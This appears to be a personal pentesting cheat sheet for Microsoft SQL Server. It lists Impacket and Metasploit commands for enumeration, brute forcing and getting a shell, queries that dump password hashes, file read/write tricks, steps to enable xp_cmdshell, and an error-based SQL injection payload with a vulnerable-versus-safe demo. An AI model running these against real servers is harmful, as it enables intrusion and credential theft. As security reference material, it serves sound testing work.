akde/infosec

Information security is ultimately about managing risk


Accessing from Linux (Impacket's mssqlclient, here with Windows authentication):

impacket-mssqlclient Administrator:password@$target -windows-auth

Default databases are:

  • master
  • tempdb
  • model
  • msdb

Enumeration

Determine version

nmap -p 445 --script ms-sql-info $target

Via Metasploit

auxiliary/scanner/mssql/mssql_ping

Via Impacket

mssqlinstance.py $target

Login brute force

scanner/mssql/mssql_login

When a working login is known, enumerate the server configuration and privileges for weaknesses

auxiliary/admin/mssql/mssql_enum

Exploitation

Execute commands

auxiliary/admin/mssql/mssql_exec

Get shell

windows/mssql/mssql_payload

Tools

Command line

sqsh -U sa -P $password -S $target:1433

From PowerShell (sqlcmd; -S takes the server or server\instance name, not a database)

sqlcmd -S $DBNAME -Q "use ADsync; select instance_id,keyset_id,entropy from mms_server_configuration"

The query shown is the one used on an Azure AD Connect server: it pulls the key set references from the ADSync database that are needed to decrypt the stored sync account credentials.

Graphical

dbeaver
IntelliJ

Exploitation

Usage

In the native command-line clients a statement is only sent to the server once the batch terminator is typed on its own line: \go (or go) in sqsh, GO in sqlcmd. Note that the version function in MSSQL is @@VERSION, not MySQL's VERSION().

1> SELECT @@VERSION;
2> \go

This is not needed in tools like Impacket's mssqlclient, which sends each line as soon as it is entered.

Useful queries

Get version:

SELECT @@version;

Enumerating logins (server level)

SELECT name FROM master.syslogins;

Enumerating database users (here those of master; run against the target database for its own users)

SELECT * FROM master.sys.sysusers;

Password hashes of SQL logins (needs CONTROL SERVER; the hashes crack offline with hashcat modes 131 for SQL 2000, 132 for 2005 and 1731 for 2012 and later)

SELECT name, password_hash FROM master.sys.sql_logins;

Enumerating databases

SELECT name FROM master.sysdatabases;

Current database

SELECT DB_NAME();

Get details from a specific database:

SELECT * FROM $dbname.information_schema.tables;
  • Then, query like this:
    SELECT * FROM $dbname.$schema.$tableName;
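The queries above answer one question each. The following T-SQL is an added example (not from the original page) that runs a single post-authentication enumeration pass using only standard SQL Server system views and functions, and also covers the two checks a pentester wants before anything else: which logins can be impersonated and which databases are TRUSTWORTHY, since both are common escalation paths to sysadmin. Paste it into sqsh/sqlcmd (finish with go) or mssqlclient.

```sql
-- Added example, not from the original page: one post-authentication
-- enumeration pass in T-SQL built only from standard system views/functions.

-- 1. Who am I and how much do I hold at the server level?
SELECT SYSTEM_USER AS login_name,
       USER_NAME()  AS db_user,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin,                    -- 1 = full control
       HAS_PERMS_BY_NAME(NULL, NULL, 'CONTROL SERVER') AS has_control_server;

-- 2. Version banner (includes edition, patch level and host OS)
SELECT @@VERSION AS version_banner;

-- 3. Logins the current login may impersonate (EXECUTE AS LOGIN = '...').
--    A row whose target is a sysadmin is a direct escalation path.
--    class 101 = server principal; major_id = the login being impersonated.
SELECT target.name  AS can_impersonate,
       grantee.name AS granted_to,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM sys.server_permissions p
JOIN sys.server_principals target  ON p.major_id = target.principal_id
JOIN sys.server_principals grantee ON p.grantee_principal_id = grantee.principal_id
WHERE p.class = 101 AND p.permission_name = 'IMPERSONATE';

-- 4. Databases: which ones this login can open, who owns them, and whether
--    TRUSTWORTHY is on (db_owner of a TRUSTWORTHY database owned by a
--    sysadmin can run code as that owner).
SELECT name,
       SUSER_SNAME(owner_sid) AS owner_login,
       is_trustworthy_on,
       HAS_DBACCESS(name)     AS can_open
FROM sys.databases;

-- 5. Linked servers: lateral movement, often with stored credentials
SELECT name, data_source, provider FROM sys.servers WHERE is_linked = 1;

-- 6. Dangerous options as currently applied. sys.configurations lists them
--    even while 'show advanced options' is off, so no sp_configure needed.
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures',
               'Ad Hoc Distributed Queries', 'clr enabled');
```

Catalog views are filtered by metadata visibility, so a low-privilege login only sees the permissions and databases it is allowed to see; an empty result from step 3 means "nothing visible to you", not necessarily "nothing configured".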

Read local files

CREATE TABLE ttt (line varchar(8000));

BULK INSERT ttt FROM 'C:\Windows\System32\License.rtf';
SELECT * FROM ttt;
DELETE FROM ttt;
...

DROP TABLE ttt;

Write files. This uses the bcp client utility, launched on the server through xp_cmdshell. Run it without parameters first: if it prints its usage text, it is installed.

bcp "SELECT * FROM ttt" queryout C:\rrr.htm -c -Slocalhost -Usa -P$pass

Possible alternative. spWriteStringToFile is not a built-in procedure; it is a custom stored procedure (implemented on top of OLE automation, sp_OACreate) that has to already exist on the target:

execute spWriteStringToFile 'This article ctddfd', 'C:\inetpub\wwwroot\','d.txt'

Execute command

EXEC xp_cmdshell 'dir'
  • Note: if xp_cmdshell is not enabled (it is off by default), enable it. This needs sysadmin (or ALTER SETTINGS), and since it is an advanced option, 'show advanced options' has to be switched on first:
    SQL (SQLPLAYGROUND\Administrator dbo@master)> EXECUTE sp_configure 'show advanced options', 1;
    SQL (SQLPLAYGROUND\Administrator dbo@master)> RECONFIGURE;
    SQL (SQLPLAYGROUND\Administrator dbo@master)> EXECUTE sp_configure 'xp_cmdshell', 1;
    [*] INFO(SQL01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
    SQL (SQLPLAYGROUND\Administrator dbo@master)> RECONFIGURE;
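Flipping xp_cmdshell on and leaving it on changes the server's exposure and shows up in any configuration audit. The following T-SQL is an added example (not from the original page): it reads the current state, enables the option only if it is off, runs a command (whoami /all is the assumed example) with the output captured in a table, and then restores both options to the values found. It assumes a sysadmin login and must be sent as one batch, because the variables do not survive line-by-line execution in mssqlclient (save it to a file and use sqlcmd -i, or end it with a single go).

```sql
-- Added example, not from the original page: run one OS command through
-- xp_cmdshell, enabling it only when needed, and leave the configuration as found.
-- Assumes sysadmin (sp_configure needs ALTER SETTINGS). Send as ONE batch.
DECLARE @was_enabled int, @advanced_was_on int;

SELECT @advanced_was_on = CAST(value_in_use AS int)
FROM sys.configurations WHERE name = 'show advanced options';
SELECT @was_enabled = CAST(value_in_use AS int)
FROM sys.configurations WHERE name = 'xp_cmdshell';

IF @was_enabled = 0
BEGIN
    -- xp_cmdshell is an "advanced" option: sp_configure refuses to touch it
    -- until 'show advanced options' is on. Both are dynamic, so RECONFIGURE
    -- applies them immediately, no restart needed.
    EXEC sp_configure 'show advanced options', 1;  RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;            RECONFIGURE;
END

-- Capture the output rows instead of relying on the client to print them.
-- xp_cmdshell returns one row per output line and NULL for blank lines.
CREATE TABLE #out (line nvarchar(4000));
INSERT INTO #out EXEC xp_cmdshell 'whoami /all';   -- assumed example command
SELECT line FROM #out WHERE line IS NOT NULL;
DROP TABLE #out;

-- Put the server back the way it was found.
IF @was_enabled = 0
BEGIN
    EXEC sp_configure 'xp_cmdshell', 0;                          RECONFIGURE;
    EXEC sp_configure 'show advanced options', @advanced_was_on; RECONFIGURE;
END
```

The output of whoami /all tells you which Windows account the SQL Server service runs as (a domain account or a local virtual account), which decides what the shell obtained through xp_cmdshell is worth.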

For INSERT queries (and other contexts that return no rows), use error-based extraction: force a type conversion that must fail, and the server echoes the value it could not convert in the error message:

' + convert(int,@@version) + '
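To see why that payload leaks data, here is an added T-SQL example (not from the original page) with an invented table dbo.guestbook and two invented procedures: add_entry_vuln builds the INSERT by string concatenation, add_entry_safe uses a parameter. The same input is fed to both; the first raises Msg 245 with @@version inside the message text, the second stores the payload as a harmless string. GO is the batch separator of sqlcmd-style clients (\go in sqsh).

```sql
-- Added example, not from the original page. Table and procedure names are
-- invented for the demo. It shows why ' + convert(int,@@version) + ' leaks
-- data inside an INSERT: the cast fails, and SQL Server puts the value it
-- could not convert into the error message.
CREATE TABLE dbo.guestbook (id int IDENTITY PRIMARY KEY, author nvarchar(100));
GO

-- Vulnerable: user input is concatenated into dynamic SQL.
CREATE PROCEDURE dbo.add_entry_vuln @author nvarchar(100) AS
BEGIN
    DECLARE @sql nvarchar(max) =
        N'INSERT INTO dbo.guestbook (author) VALUES (''' + @author + ''')';
    EXEC (@sql);
END
GO

-- Attacker input as the application would receive it:
--   x' + convert(int, @@version) + 'y
-- The statement that actually runs is
--   INSERT INTO dbo.guestbook (author) VALUES ('x' + convert(int, @@version) + 'y')
-- and fails with
--   Msg 245 ... Conversion failed when converting the nvarchar value
--   'Microsoft SQL Server ...' to data type int.
EXEC dbo.add_entry_vuln N'x'' + convert(int, @@version) + ''y';
GO

-- The same trick pulls out any single value, e.g. the first login name;
-- add a NOT IN (...) filter to walk through the rest one by one.
EXEC dbo.add_entry_vuln
    N'x'' + convert(int, (SELECT TOP 1 name FROM master..syslogins ORDER BY name)) + ''y';
GO

-- Hardened: same INSERT with a parameter; @author is data, never parsed as SQL.
CREATE PROCEDURE dbo.add_entry_safe @author nvarchar(100) AS
BEGIN
    EXEC sp_executesql
        N'INSERT INTO dbo.guestbook (author) VALUES (@a)',
        N'@a nvarchar(100)', @a = @author;
END
GO

-- Same payload is stored literally; nothing is evaluated, nothing leaks.
EXEC dbo.add_entry_safe N'x'' + convert(int, @@version) + ''y';
SELECT id, author FROM dbo.guestbook;
GO
```

Whether the leak reaches the attacker depends on the application showing database errors in its responses; with errors suppressed the same injection point still works, but it has to be exploited blind (time-based with WAITFOR DELAY, or out of band).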

Notes

Useful resources with more queries:


About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
